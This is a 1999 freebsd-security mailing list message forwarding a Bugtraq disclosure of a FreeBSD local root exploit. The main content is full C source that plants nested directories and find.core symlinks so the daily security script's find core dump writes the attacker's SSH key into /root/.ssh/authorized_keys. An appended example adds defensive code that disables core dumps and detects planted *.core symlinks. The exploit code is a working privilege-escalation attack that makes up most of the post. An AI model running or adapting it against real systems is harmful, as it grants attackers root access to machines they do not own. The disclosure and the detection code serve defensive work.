From owner-freebsd-security Thu Aug 26 9:47:20 1999
Date: Thu, 26 Aug 1999 12:45:37 -0400
To: freebsd-security@freebsd.org
From: Forrest Aldrich
Subject: Fwd: FreeBSD (and other BSDs?) local root exploit
Sender: owner-freebsd-security@FreeBSD.ORG

>Approved-By: aleph1@SECURITYFOCUS.COM
>Delivered-To: bugtraq@securityfocus.com
>X-Mailer: XFMail 1.3 [p0] on Linux
>X-SMS: +48601383657@text.plusgsm.pl
>X-PGP: PGP key on WWW or finger
>X-Operating-System: FreeBSD 3.2-STABLE (i386)
>Date: Tue, 24 Aug 1999 23:47:05 +0200
>Reply-To: Przemyslaw Frasunek
>Sender: Bugtraq List
>From: Przemyslaw Frasunek
>Organization: Lubelska Grupa Uzytkownikow BSD
>Subject: FreeBSD (and other BSDs?) local root exploit
>X-To: bugtraq@securityfocus.com
>To: BUGTRAQ@SECURITYFOCUS.COM
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>/*
>
> (c) 1999 babcia padlina ltd.
>
> bug in fts_print function allows to overwrite any file in system, when
> running /etc/security script (executed from 'daily' scripts).
>
> affected systems:
>   - freebsd (all versions)
>   - probably openbsd/netbsd
>
> fix:
>   - limit root's coredump size
>   - patch libc
>
>*/
>
>#include <stdio.h>
>#include <string.h>
>#include <unistd.h>
>#include <sys/types.h>
>#include <sys/stat.h>
>
>#define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n"
>#define FILE "/root/.ssh/authorized_keys"
>#define CORE "find.core"
>#define DEPTH 300
>#define BUFSIZE 250
>
>/* create and enter directory `dir`, then create symlink linkto -> linkfrom */
>int makedir(dir, linkfrom, linkto)
>char *dir, *linkfrom, *linkto;
>{
>
>    if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO)))
>        return -1;
>
>    if (chdir(dir))
>        return -1;
>
>    if (symlink(linkfrom, linkto) < 0)
>        return -1;
>
>    return 0;
>}
>
>
>int main(argc, argv)
>int argc;
>char **argv;
>{
>    int i = 0;
>    char pid[10], buf[BUFSIZE];
>
>    sprintf(pid, "%d", getpid());
>
>    if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO)))
>    {
>        perror("mkdir()");
>        return -1;
>    }
>
>    if (chdir(pid))
>    {
>        perror("chdir()");
>        return -1;
>    }
>
>    bzero(buf, BUFSIZE);
>    memset(buf, 0x41, BUFSIZE-1);
>
>    for(i=0;i<DEPTH;i++)
>    {
>        if (makedir(STRING, FILE, CORE) < 0)
>        {
>            perror("makedir()");
>            return -1;
>        }
>
>        if(makedir(buf, FILE, CORE) < 0)
>        {
>            perror("makedir()");
>            return -1;
>        }
>    }
>
>    return 0;
>}
>
>- ---
>* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 *
>* Inet: venglin@FreeBSD.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF *
>
>-----BEGIN PGP SIGNATURE-----
>Version: PGPfreeware 5.0i for non-commercial use
>Charset: noconv
>
>iQA/AwUBN8MS2P6SPyHAYTvjEQLK5ACfZ1cVpjGzqIF3bTsIX/wrahJOqy4AoOEx
>JkgnTo+Dk3QUFGT2bZdmxx9S
>=Tyvh
>-----END PGP SIGNATURE-----
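
The fix list in the forwarded post names limiting root's core dump size. The following is an added example, not part of the original post or of FreeBSD's own scripts: it applies that limit with setrlimit() and checks a tree for planted symlinks named *.core, opening each directory relative to its parent so that nesting deeper than PATH_MAX is still walked. The function names are assumptions made for this example.

```c
#define _POSIX_C_SOURCE 200809L
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/stat.h>
#include <unistd.h>

/* Mitigation: zero the soft and hard core limits; inherited across exec. */
int disable_core_dumps(void)
{
    struct rlimit rl = { 0, 0 };
    return setrlimit(RLIMIT_CORE, &rl);
}

/* Detection: count symlinks named *.core below `name` (relative to `at`).
 * Symlinks are never followed; one descriptor is held open per level.
 * Returns -1 on any error, which a caller should treat as a finding too. */
int count_core_symlinks(int at, const char *name)
{
    int fd = openat(at, name, O_RDONLY | O_DIRECTORY | O_NOFOLLOW), hits = 0;
    DIR *d = fd < 0 ? NULL : fdopendir(fd);
    struct dirent *e;
    struct stat st;
    if (d == NULL) { if (fd >= 0) close(fd); return -1; }
    while (hits >= 0 && (e = readdir(d)) != NULL) {
        size_t n = strlen(e->d_name);
        if (!strcmp(e->d_name, ".") || !strcmp(e->d_name, "..") ||
            fstatat(dirfd(d), e->d_name, &st, AT_SYMLINK_NOFOLLOW) != 0)
            continue;   /* skip self/parent and entries that vanished */
        if (S_ISLNK(st.st_mode) && n >= 5 && !strcmp(e->d_name + n - 5, ".core")) {
            hits++;
        } else if (S_ISDIR(st.st_mode)) {
            int r = count_core_symlinks(dirfd(d), e->d_name);
            hits = r < 0 ? -1 : hits + r;
        }
    }
    closedir(d);
    return hits;
}

int main(int argc, char **argv)
{
    const char *root = argc > 1 ? argv[1] : ".";
    int n = disable_core_dumps() ? -1 : count_core_symlinks(AT_FDCWD, root);
    printf("core-named symlinks: %d\n", n);
    return n != 0;
}
```

Run it against a user-writable tree before a privileged traversal of that tree; a non-zero exit status means a core-named symlink was found or the walk failed.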